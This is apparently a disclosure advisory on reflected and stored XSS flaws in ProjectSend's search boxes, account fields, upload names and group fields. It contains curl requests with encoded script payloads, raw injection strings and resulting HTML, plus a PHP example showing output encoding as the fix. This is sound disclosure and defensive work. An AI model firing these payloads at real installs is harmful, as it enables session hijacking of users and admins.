XSS vulnerabilities in Projectsend

Having been made aware of some vulnerabilities in ProjectSend, I also had a look at the application and discovered multiple XSS issues. Here is a list of the issues found:

Description

ProjectSend is a self-hosted, PHP-based file-transfer platform. Several serious vulnerabilities have already been published (e.g. on ExploitDB). Here are some further XSS vulnerabilities affecting ProjectSend.

1. Non-Persistent XSS

1.1 my_files/index.php

As a client, in the search box on my_files/index.php (POST parameter “search”):

curl 'http://projectsend.local.de/my_files/' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=2pgk2ehohqbqmgfr618sisqui2' -H 'Host: projectsend.local.de' -H 'Referer: http://projectsend.local.de/my_files/' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H 'Content-Type: application/x-www-form-urlencoded' --data 'search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E'

1.2 Searchboxes

As an admin, in the search box on “Manage Clients” (clients.php, POST parameter “search”):

curl 'http://projectsend.local.de/clients.php' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=2pgk2ehohqbqmgfr618sisqui2' -H 'Host: projectsend.local.de' -H 'Referer: http://projectsend.local.de/clients.php' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H 'Content-Type: application/x-www-form-urlencoded' --data 'search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E'

Output:

<input type="text" name="search" id="search" value=""><script>alert('XSS')</script>" class="txtfield form_actions_search_box" />

The search boxes on “Clients groups”, “System Users” and the “Recent activities log” are injectable in the same way: the search term is written back into the value attribute of the search field without encoding.

2. Persistent XSS

2.1 My Account

As a client, in the “My Account” field “Name”. No special vector is required.

HTML output for input "><script>alert(1);</script>:

<input type="text" name="add_client_form_name" id="add_client_form_name" class="required" value=""><script>alert(1);</script>" placeholder="Will be visible on the client's file list" />

This XSS also fires for admins when they open the Clients -> Manage clients page (clients.php), where the stored name is written into a table cell without encoding:

clients.php HTML output:

<td><input type="checkbox" name="selected_clients[]" value="2" /></td>
<td>"><script>alert(1);</script></td>
<td>Client1</td>

The fields “Address” and “Telephone” are injectable in the same way.

2.2 File upload fields

As a client, in the “File upload” field “Name”.

A simple vector suffices: "<script>alert('XSS')</script>

The XSS is triggered when admins open the dashboard (the content is loaded from /actions-log.php via Ajax) or when they access the “Recent activities log”.

actions-log.php HTML output:

<td class="footable-visible">"<script>alert('XSS')</script></td>

2.3 Add groups fields

As admin in Groups -> Add new.

The fields “Name” and “Description” are injectable. The XSS is triggered on the “Manage groups” page.

Simple vector: "><script>alert('XSS')</script>
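As an added example (not code from ProjectSend or from this advisory), the following PHP script reproduces the two output contexts seen above, the value attribute of the search box under 1.2 and the table cells under “My Account” and “File upload fields”, first concatenated raw as the vulnerable pages do and then passed through htmlspecialchars() with ENT_QUOTES. The function names and the payloads wired in are my own constructions; the fix merged into ProjectSend is not claimed to look like this.

```php
<?php
// Added example (not ProjectSend code): the two output contexts the advisory
// shows, an attribute value and a table cell, rendered raw the way the
// vulnerable pages do, and rendered with output encoding applied.
declare(strict_types=1);

// Encode a string for an HTML text node or a double-quoted attribute value.
// ENT_QUOTES also covers single-quoted attributes; ENT_SUBSTITUTE replaces
// invalid UTF-8 instead of returning '' (which would silently blank the field).
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Reflected case: the search term is concatenated into a value attribute.
function search_box_vulnerable(string $search): string
{
    return '<input type="text" name="search" id="search" value="' . $search
        . '" class="txtfield form_actions_search_box" />';
}

function search_box_fixed(string $search): string
{
    return '<input type="text" name="search" id="search" value="' . e($search)
        . '" class="txtfield form_actions_search_box" />';
}

// Stored case: a client name, file name or group name shown in a table cell.
function table_cell_vulnerable(string $stored): string
{
    return '<td>' . $stored . '</td>';
}

function table_cell_fixed(string $stored): string
{
    return '<td>' . e($stored) . '</td>';
}

// True when the rendered HTML still contains a live <script> tag.
function contains_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// The payloads used in the advisory (constructed test input).
$reflected = '"><script>alert(\'XSS\')</script>';
$stored    = '"><script>alert(1);</script>';

$rows = [
    'search box, raw'   => search_box_vulnerable($reflected),
    'search box, fixed' => search_box_fixed($reflected),
    'table cell, raw'   => table_cell_vulnerable($stored),
    'table cell, fixed' => table_cell_fixed($stored),
];
foreach ($rows as $label => $html) {
    printf("%-18s %s\n", $label . ':', $html);
}

// Self-check: the raw renderings carry the script tag, the encoded ones do not.
$ok = contains_script($rows['search box, raw'])
   && contains_script($rows['table cell, raw'])
   && !contains_script($rows['search box, fixed'])
   && !contains_script($rows['table cell, fixed']);
exit($ok ? 0 : 1);
```

Run it with the PHP CLI; the fixed search box renders the payload as value="&quot;&gt;&lt;script&gt;alert(&apos;XSS&apos;)&lt;/script&gt;", which the browser displays as text and never executes. The point of encoding at output time rather than only filtering on input is visible in section 2: the same stored client name reaches clients.php, the dashboard and actions-log.php, so every place that writes it into HTML must encode it, and records already in the database are covered too.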

Solution

I developed a fix for these and other vulnerabilities; other people have also contributed many security fixes to ProjectSend, which have been accepted into the master branch. The solution is therefore to update to the current version from GitHub. See https://github.com/ignacionelson/ProjectSend/issues/80 for the discussion.

Disclosure

This information also appeared on Bugtraq.